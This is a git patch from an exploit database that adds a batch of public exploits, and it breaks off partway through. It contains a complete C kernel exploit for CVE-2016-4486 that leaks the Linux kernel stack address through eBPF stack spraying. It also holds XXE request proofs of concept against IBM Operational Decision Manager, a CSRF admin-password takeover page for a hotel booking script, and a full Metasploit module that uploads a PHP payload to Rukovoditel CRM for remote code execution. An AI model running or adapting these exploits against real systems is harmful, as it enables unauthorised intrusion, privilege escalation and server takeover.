From aedf107ce96e59f29b599736a8838ced6f07a680 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 20 Dec 2018 05:01:43 +0000 Subject: [PATCH] DB: 2018-12-20 12 changes to exploits/shellcodes MiniShare Server 1.3.2 - Remote Denial of Service MiniShare 1.3.2 - Remote Denial of Service MiniShare 1.5.5 - Local Buffer Overflow (SEH) MiniShare 1.5.5 - 'users.txt' Local Buffer Overflow (SEH) Linux Kernel 4.4 - 'rtnetlink' Stack Memory Disclosure PassFab RAR 9.3.2 - Buffer Overflow (SEH) LanSpy 2.0.1.159 - Local Buffer Overflow PDF Explorer 1.5.66.2 - Buffer Overflow (SEH) MiniShare HTTP 1.5.5 - Remote Buffer Overflow MiniShare 1.5.5 - Remote Buffer Overflow MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password) Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit) Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting Integria IMS 5.0.83 - Cross-Site Request Forgery Bolt CMS < 3.6.2 - Cross-Site Scripting Yeswiki Cercopitheque - 'id' SQL Injection IBM Operational Decision Manager 8.x - XML External Entity Injection Linux/x64 - Disable ASLR Security Shellcode (93 Bytes) --- exploits/linux/local/46006.c | 503 ++++++++++++++++++++++++++++ exploits/multiple/webapps/46017.txt | 48 +++ exploits/php/webapps/46010.html | 45 +++ exploits/php/webapps/46011.rb | 204 +++++++++++ exploits/php/webapps/46012.txt | 27 ++ exploits/php/webapps/46013.html | 41 +++ exploits/php/webapps/46014.txt | 37 ++ exploits/php/webapps/46015.txt | 19 ++ exploits/windows/local/46008.py | 59 ++++ exploits/windows/local/46009.py | 108 ++++++ exploits/windows/local/46016.py | 57 ++++ files_exploits.csv | 19 +- files_shellcodes.csv | 1 + shellcodes/linux_x86-64/46007.c | 85 +++++ 14 files changed, 1249 insertions(+), 4 deletions(-) create mode 100644 exploits/linux/local/46006.c create mode 100644 exploits/multiple/webapps/46017.txt create mode 100644 exploits/php/webapps/46010.html create mode 100755 exploits/php/webapps/46011.rb create mode 100644 exploits/php/webapps/46012.txt create mode 100644 exploits/php/webapps/46013.html create mode 100644 exploits/php/webapps/46014.txt create mode 100644 exploits/php/webapps/46015.txt create mode 100755 exploits/windows/local/46008.py create mode 100755 exploits/windows/local/46009.py create mode 100755 exploits/windows/local/46016.py create mode 100644 shellcodes/linux_x86-64/46007.c diff --git a/exploits/linux/local/46006.c b/exploits/linux/local/46006.c new file mode 100644 index 000000000..0811bf731 --- /dev/null +++ b/exploits/linux/local/46006.c @@ -0,0 +1,503 @@ +/* + * [ Briefs ] + * - CVE-2016-4486 has discovered and reported by Kangjie Lu. + * - This is local exploit against the CVE-2016-4486. + * + * [ Tested version ] + * - Distro : Ubuntu 16.04 + * - Kernel version : 4.4.0-21-generic + * - Arch : x86_64 + * + * [ Prerequisites ] + * - None + * + * [ Goal ] + * - Leak kernel stack base address of current process by exploiting CVE-2016-4486. + * + * [ Exploitation ] + * - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack. + * - This exploit gets 61-bits stack base address among the 64-bits full address. + * remaining 3-bits is not leaked because of limitation of ebpf. + * - Full exploitation are performed as follows. + * + * 1. Spraying kernel stack as kernel stack address via running ebpf program. + * - We can spray stack up to 512-bytes by running ebpf program. + * - After this step, memory to be leaked will be filled with kernel stack address. + * 2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address. + * - After this step, stack address : 0xffff8800????????; (? is unknown address yet.) + * 3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one? + * - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address. + * - Then, How to overcome this challenge?? The one of possible answer is that + * do operation on high-4bytes with carefully selected value which changes low-4bytes. + * For example, Assume that real stack address is 0xffff880412340000; + * and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value); + * The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this! + * The result makes us to know that high 4-bytes are smaller than 0x12360000; + * Then, We can keep going with smaller value. + * - The algorithm is quite similar to quick-search. + * 4. Unfortunately, ebpf program limitation stops us to leak full 64-bits. + * - 3-bits (bit[16], bit[15], bit[14]) are not leaked. + * - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker. + * Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()? + * - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked. + * - If I use compat-sendmsg(), The execution path will be different from normal sendmsg(). + * This makes me to spray it more far. + * + * [ Run exploit ] + * - $ gcc poc.c -o poc + * - $ ./poc + * .... + * .... + * leak stack address range : + * -----from : ffff88007f7e0000 + * --------to : ffff88007f7fc000 + * (Since we can get 61-bit address, Print the possible address range out.) + * + * [ Contact ] + * - jinb.park7@gmail.com + * - github.com/jinb-park + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define GPLv2 "GPL v2" +#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) + +#define INTERFACE_INDEX (0) +#define LEAK_OFFSET (28) + +/* + * BPF-based stack sprayer + */ +/* registers */ +/* caller-saved: r0..r5 */ +#define BPF_REG_ARG1 BPF_REG_1 +#define BPF_REG_ARG2 BPF_REG_2 +#define BPF_REG_ARG3 BPF_REG_3 +#define BPF_REG_ARG4 BPF_REG_4 +#define BPF_REG_ARG5 BPF_REG_5 +#define BPF_REG_CTX BPF_REG_6 +#define BPF_REG_FP BPF_REG_10 + +#define BPF_MOV32_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) + +int bpf_(int cmd, union bpf_attr *attrs) +{ + return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); +} + +int prog_load(struct bpf_insn *insns, size_t insns_count) +{ + char verifier_log[100000]; + union bpf_attr create_prog_attrs = { + .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, + .insn_cnt = insns_count, + .insns = (uint64_t)insns, + .license = (uint64_t)GPLv2, + .log_level = 1, + .log_size = sizeof(verifier_log), + .log_buf = (uint64_t)verifier_log + }; + int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs); + int errno_ = errno; + errno = errno_; + if (progfd == -1) { + printf("bpf prog load error\n"); + exit(-1); + } + return progfd; +} + +int create_socket_by_socketpair(int *progfd) +{ + int socks[2]; + if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) { + printf("socketpair error\n"); + exit(-1); + } + if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) { + printf("setsockopt error\n"); + exit(-1); + } + return socks[1]; +} + +int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) +{ + int progfd = prog_load(insns, insns_count); + return create_socket_by_socketpair(&progfd); +} + +#define NR_sendmsg_32 370 // for 32-bit + +typedef unsigned int compat_uptr_t; +typedef int compat_int_t; +typedef unsigned int compat_size_t; +typedef unsigned int compat_uint_t; + +struct compat_msghdr { + compat_uptr_t msg_name; /* void * */ + compat_int_t msg_namelen; + compat_uptr_t msg_iov; /* struct compat_iovec * */ + compat_size_t msg_iovlen; + compat_uptr_t msg_control; /* void * */ + compat_size_t msg_controllen; + compat_uint_t msg_flags; +}; +struct compat_iovec { + compat_uptr_t iov_base; + compat_size_t iov_len; +}; + +int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags) +{ + int r = -1; + + asm volatile ( + "push %%rax\n" + "push %%rbx\n" + "push %%rcx\n" + "push %%rdx\n" + "push %%rsi\n" + "push %%rdi\n" + "mov %1, %%eax\n" + "mov %2, %%ebx\n" + "mov %3, %%ecx\n" + "mov %4, %%edx\n" + "int $0x80\n" + "mov %%eax, %0\n" + "pop %%rdi\n" + "pop %%rsi\n" + "pop %%rdx\n" + "pop %%rcx\n" + "pop %%rbx\n" + "pop %%rax\n" + : "=r" (r) + : "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags) + : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi" + ); + + return r; +} + +#define COMPAT_SENDMSG +void trigger_proc(int sockfd) +{ +#ifdef COMPAT_SENDMSG + struct compat_msghdr *msg = NULL; + struct compat_iovec *iov = NULL; +#else + struct msghdr *msg = NULL; + struct iovec *iov = NULL; +#endif + char *buf = NULL; + int r; + + // allocate under-32-bit address for compat syscall + msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (msg == MAP_FAILED) { + printf("mmap error : %d, %s\n", errno, strerror(errno)); + exit(0); + } + buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (buf == MAP_FAILED) { + printf("mmap error : %d, %s\n", errno, strerror(errno)); + exit(0); + } + iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (buf == MAP_FAILED) { + printf("mmap error : %d, %s\n", errno, strerror(errno)); + exit(0); + } + +#ifdef COMPAT_SENDMSG + iov->iov_base = (compat_uptr_t)buf; +#else + iov->iov_base = buf; +#endif + iov->iov_len = 128; + msg->msg_name = NULL; + msg->msg_namelen = 0; +#ifdef COMPAT_SENDMSG + msg->msg_iov = (compat_uptr_t)iov; +#else + msg->msg_iov = iov; +#endif + msg->msg_iovlen = 1; + msg->msg_control = NULL; + msg->msg_controllen = 0; + msg->msg_flags = 0; + +#ifdef COMPAT_SENDMSG + r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0); +#else + r = sendmsg(sockfd, msg, 0); +#endif + if (r < 0) { + printf("sendmsg error, %d, %s\n", errno, strerror(errno)); + exit(-1); + } +} + +int sockfds = -1; + +void stack_spraying_by_bpf(unsigned long val) +{ + int r; + + struct bpf_insn stack_spraying_insns[] = { + BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP), + BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val), + + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504), + BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512), + + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN() + }; + + sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns)); + if (sockfds < 0) + return; + + trigger_proc(sockfds); + close(sockfds); + //sleep(1); +} + +/* +28byte, 32byte including padding +struct rtnl_link_ifmap { + __u64 mem_start; + __u64 mem_end; + __u64 base_addr; + __u16 irq; + __u8 dma; + __u8 port; +};*/ + +// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol) + +struct { + struct nlmsghdr nh; + struct ifinfomsg ifm; + char attrbuf[512]; +} req; + +// Ubuntu 4.4.0-21-generic +#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and +#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or + +int main(int argc, char **argv) +{ + unsigned char buf[65535]; + unsigned char map_buf[36] = {0,}; + struct nlmsghdr *nl_msg_ptr; + struct ifinfomsg *inf_msg_ptr; + struct rtnl_link_ifmap *map_ptr; + struct rtattr *rta_ptr; + int size, len, attr_len, offset; + int progfd; + unsigned int sub_val = 0; + unsigned int leak_value; + unsigned long leak_full_stack = 0; + unsigned int low_stack = 0; + int i; + + for (i=0; i<16; i++) { + int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE); + + memset(&req, 0, sizeof(req)); + + req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST; + req.nh.nlmsg_type = RTM_GETLINK; + req.nh.nlmsg_seq = 1; + + req.ifm.ifi_family = AF_UNSPEC; + req.ifm.ifi_index = INTERFACE_INDEX; + req.ifm.ifi_change = 0xffffffff; + + if (i == 0) + sub_val = 0; + else + sub_val += (1 << (32 - i)); + + stack_spraying_by_bpf((unsigned long)sub_val); + if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) { + printf("send error\n"); + goto out; + } + + while (1) { + if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) { + fprintf(stderr, "ERROR recv(): %s\n", strerror(errno)); + goto out; + } + + for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) { + len = nl_msg_ptr->nlmsg_len; + + if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) { + printf("NLMSG_ERROR\n"); + goto out; + } + else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE) + break; + + if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) { + printf("Not OK\n"); + goto out; + } + + attr_len = IFLA_PAYLOAD(nl_msg_ptr); + inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr); + rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr); + + for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) { + if (rta_ptr->rta_type == IFLA_MAP) { + if (rta_ptr->rta_len != sizeof(map_buf)) { + printf("wrong size\n"); + goto out; + } + + memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf)); + map_ptr = &map_buf; + leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET); + printf("leak_value : %08x\n", leak_value); + break; + } + } + + size -= NLMSG_ALIGN(len); + nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len)); + } + + break; + } + + if (low_stack == 0) + low_stack = leak_value; + else + if (leak_value != low_stack) + sub_val &= (~(1 << (32 - i))); // clear bit + + memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4); + memcpy((unsigned char *)&leak_full_stack, &sub_val, 4); + printf("[try-%d] stack address : %lx\n", i, leak_full_stack); +out: + close(rtnetlink_sk); + } + + printf("=======================================================================\n"); + printf("leak stack address range : \n"); + printf("-----from : %lx\n", leak_full_stack & RANGE_MIN_MASK); + printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK); + printf("======================================================================\n"); + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/46017.txt b/exploits/multiple/webapps/46017.txt new file mode 100644 index 000000000..6feaf45dd --- /dev/null +++ b/exploits/multiple/webapps/46017.txt @@ -0,0 +1,48 @@ +# Exploit Title: [XML External Entity Injection (XXE)] +# Date: [2018-12-18] +# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company] +# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10744149] +# Version: [v8.6 - v8.7 - v8.8 - v8.9] (REQUIRED) +# Tested on: [Windows 10] +# CVE : [CVE-2018-1821] + +POC#1: Port Scanning: +====================== +POST /res/api/v1/ruleapps?csrf_token=kgwGZpsLIpCrCuS3s2mLS4%2BuXKM%3D HTTP/1.1 +Host: 172.25.28.35:9443 +Connection: close +Content-Length: 83 +Origin: https://172.25.28.35:9443 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 +Content-Type: application/xml +Accept: */* +Referer: https://172.25.28.35:9443/res/protected/rest.jsf +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=0000EKq5uAZFEICNv26D32qeVid:1c4i4k9om; LtpaToken2=Py4PGunQHKXqtYpW0R+1XxlcENqSI/5/RCinV7Cl0g8WlAWAfff5IAPwHJDWZL+LFtTTT+tfmADp38hW7xVieS74jJB79m1IDfIpeGvKOzJ99NmTkV0uPm22vdUZp8qKF8Xt3J7mO5L1tTohHdIg/eXZj2hZxWfLYf2KyGyqJ+D16g4fIu7zazZProW9RDgdoGpppM/Wfkxst8iQAj6+4a3tdyJkNJ8+QdPeakHYCbFA6aTcNXncwkWsKDwznGZ30pLXSxp8wKJaESkkuY5F4w6lLGVw7d6p34M6aDQGixkR4J7I+ZLQ0OE9Fzt6Aq+AETBcMLFqPOpPEMtrZkkExey8Lc9hMRs5tAVXramTT6h38uquu/2DyqfOaJeRATM8tO4UZs7clSsXQjsbU9s/ueFZR8YA9qrXUTChoysZtCrXTdmqs87FiqwLZNzWI7bUjf8crCNDJgYzPVsnK0Oo46Hdi8nlKhvr8pzxSMblS4gjgSsKo8MYDi/uzexkqMB3ddTGp9vUVEG30L9Ya9Z4v7D9WusN7fJxn1x3g9NmtWMe6uCsyIRFU0+RADGsKYfsC09NItUciIo9GnJdrsla9TnaqVaiQhu85GpT6LPrZs0wPjV6WYGTOLMMd2Z/VVjaTn9pU5mPQlT/dFVbLoJvNI+uS66GP1HmXgj8ofe5J/o= + + + + + + +POC#2: Using External DTD File: +====================================== +POST /rest/bpm/monitor/events HTTP/1.1 +Host: 172.25.28.41:9445 +Connection: close +Cache-Control: max-age=0 +Authorization: Basic Ym1hZG1pbjpibWFkbWlu +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Content-Type: text/xml +SOAPAction: "CBE_FOR_EACH_TRANSACTION_REQUESTI" +Accept-Language: en-US,en;q=0.9 +Cookie: JSESSIONID=00002W7K2hStpCQu03vef0J3Lyt:1cd2vk5q4; com.ibm.wbimonitor.UserName=bmadmin; MUMLogoutURL=https://172.25.28.41:9445/mum/logout; LtpaToken2=RKW0datOtQMYCPkxs8YAKklRMLNsYHWe264hjvsRMBjvc6AW29/OVsNJA8pO8MQQMBXOfBuWtNQPWVJ/cw55YdzVyfPdLG8d+cQ77kt7XiE77scfNfPCVU77zcFaG8qVO8xUXXX5U4+nTxlXNIEQR1iMPN2+w3rnAIZcDL7vgK3YN0QPGAn8rQmrYswXoBf6WmgI8uc0yA/PNRIXL5Lt9DeqJCU0C/E2FvJ9nK8T8uQqPPiS63EOutom825arJYLV9zndN1ArgdwAAOMO61Top9bM/VsMh/ryshaj6CsfrmaBvFt5FIVfvLN5u2iEQq0KVCxPAlH5yceSQV5gP884rhiN9M1N/QOQ54k3F1ZMBkfhDofJyDqsXMOMCaTXTsoyWhsC/KLPcjC3thQQxxijDrM7Yql411tUDv08xdDzu7apEF5QBuGrVd2Pgg5luKWmcao5BduwSXwaKJEQXnULAbYacr48gol7aHJucPhY6JqkFgvjvV4XfFNM1jsWbA+09KD2F0GALjNzLMb54sI5RLhHLVZu/LBL3RWrZFPPSE0D9YW2LrKtNGHBkFeuw/I8ULL/JjlfWHHheZug5t45H1oNPHpQp843GwTAbWGtNCb7rZLgA7+jCR2OYmtg8vrlJFvSzhSxg6ahYppX1PouekOuNvC7EvR51PHcw2qJRE= +Content-Length: 99 + + + \ No newline at end of file diff --git a/exploits/php/webapps/46010.html b/exploits/php/webapps/46010.html new file mode 100644 index 000000000..016ff12ec --- /dev/null +++ b/exploits/php/webapps/46010.html @@ -0,0 +1,45 @@ +# Exploit Title: Admin Account take over Via CSRF +# Google Dork: N/A +# Date: 17-12-2018 +# Exploit Author: Sainadh Jamalpur +# Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/ +# Software Link: https://demo.phpjabbers.com/1545033057_422/index.php?controller=pjAdmin&action=pjActionIndex +# Version: 3.4 +# Tested on: Windows x64/ Kali linux x64 +# CVE : N/A + +************************Description:********************** + +The online hotel reservation system is built in PHP and uses MySQL to +store data. The script provides a powerful room booking and reservation +management functionality and allows you to install a clear +call-to-action tool on your hotel website which will impact conversions +and increase bookings. Our room booking system is highly customizable +and compatible with various website types. + +*************************Vulnerability Description:**************** + An attacker can take the admin account via sending the Malicious link +to the authenticated user then the Victim clicks on the malicious link +then the admin password is change + +************************************ +PoC************************************** + + + + + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46011.rb b/exploits/php/webapps/46011.rb new file mode 100755 index 000000000..225de6547 --- /dev/null +++ b/exploits/php/webapps/46011.rb @@ -0,0 +1,204 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Rukovoditel Project Management/CRM 2.3.1 - +(Authenticated) Remote Code Execution', + 'Description' => %q{ + This module exploits a file upload vulnerability in Rukovoditel +PM/CRM version 2.3.1. + Application allows the user to upload a background image, and does +not perform extension checking exactly. + Application agrees to upload if "gif" file header is added to the +header of our payload file. + However, many file types do not have permission to work. +".htaccess" is blocking that. + it has file extension check as follows, + + There is no upper and lower case control. Therefore, the extension +of our file can be .pHp .Php .PhP and such. + The module is uploading by create a payload as above to get +Meterpreter session. + }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf +Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', ' +https://pentest.com.tr/exploits/Rukovoditel-Project-Management-CRM-2-3-1-Authenticated-Remote-Code-Execution.html'], + + ['CVE', '2018-20166'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Rukovoditel PM/CRM <= 2.3.1', {}] + ], + 'DisclosureDate' => '14 Dec 2018', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to i-doit', +'/']), + OptString.new('USER', [true, 'User to login with', 'admin']), + OptString.new('PASS', [true, 'Password to login with', +'password']), + ], self.class) + end +## +# Exploitation of Vulnerability +## + def exploit + + random_value = Rex::Text.rand_text_alpha(10) + sid_md5 = Digest::MD5.hexdigest random_value + print_status("sid = #{sid_md5}") + + cookie = "cookie_test=please_accept_for_session;" + " sid=" + sid_md5 + + res1 = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, +"/index.php?module=users/login"), + 'cookie' => cookie, + }) + if not (res1 and res1.body =~ /form_session_token\" +value=\"([^\"]+)\"/) + return nil + end + token = $1 +## +# Authorized User Login +## + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, +"/index.php?module=users/login&action=login"), + 'cookie' => cookie, + 'vars_post' => { + "form_session_token" => token, + "username" => datastore['USER'], + "password" => datastore['PASS'] + + } + }) +## +# Login Control +## + + tok = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, +"/index.php?module=dashboard/"), + }) + + html = tok.body + if html =~ /Rukovoditel/ + print_good("Login Successful") + else + print_status("User information is incorrect. Login failed") + exit 0 + end +## +# Arbitrary ".pHp" file upload +## + + boundary = Rex::Text.rand_text_alphanumeric(29) + + data = "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"form_session_token\"\r\n" + data << "\r\n" + data << "{token}" + data << "\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[LOGIN_PAGE_HEADING]\"\r\n" + data << +"\r\nPage-Heading\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[LOGIN_PAGE_CONTENT]\"\r\n" + data << "\r\nPage-Desc\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"APP_LOGIN_PAGE_BACKGROUND\"; filename=\"akkus.pHp\"\r\n" + data << "Content-Type: binary/octet-stream\r\n" + data << "\r\n" + data << "GIF89a;\n\n" + data << "\n\n" + data << payload.encoded + data << "\r\n-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[APP_LOGIN_PAGE_BACKGROUND]\"\r\n" + data << "\r\n{upload_name}\r\n" + data << "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; +name=\"CFG[LOGIN_PAGE_HIDE_REMEMBER_ME]\"\r\n" + data << "\r\n0\r\n-----------------------------{boundary}--\r\n" + + res2 = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; +boundary=---------------------------{boundary}', + 'cookie' => cookie, + }, + 'uri' => normalize_uri(target_uri, +"/index.php?module=configuration/save&redirect_to=configuration/login_page") + + }) + + +## +# Informations +## + print_status("#{peer} - Uploading in progress...") + print_good("Upload Successful") +## +# Calling Shell File Name +## + shellc = send_request_cgi({ + 'method' => 'GET', + 'cookie' => cookie, + 'uri' => normalize_uri(target_uri, +"/index.php?module=configuration/login_page"), + }) + + if not (shellc and shellc.body =~ /CFG_APP_LOGIN_PAGE_BACKGROUND\" +value=\"([^\"]+)\"/) + return nil + end + shelln = $1 + print_good("#{peer} - Payload uploaded as #{shelln}") + register_file_for_cleanup(shelln) +## +# Get Session +## + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/uploads/", shelln), + }) + + end +end \ No newline at end of file diff --git a/exploits/php/webapps/46012.txt b/exploits/php/webapps/46012.txt new file mode 100644 index 000000000..17e4f04c1 --- /dev/null +++ b/exploits/php/webapps/46012.txt @@ -0,0 +1,27 @@ +# Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-12-18 +# Google Dork: N/A +# Vendor: Artica ST +# Software Link: https://github.com/articaST/integriaims +# Affected Version: 5.0.83 and possibly before +# Patched Version: 5.0.84 +# Category: Web Application +# Platform: Windows +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-19828 +# References: +# 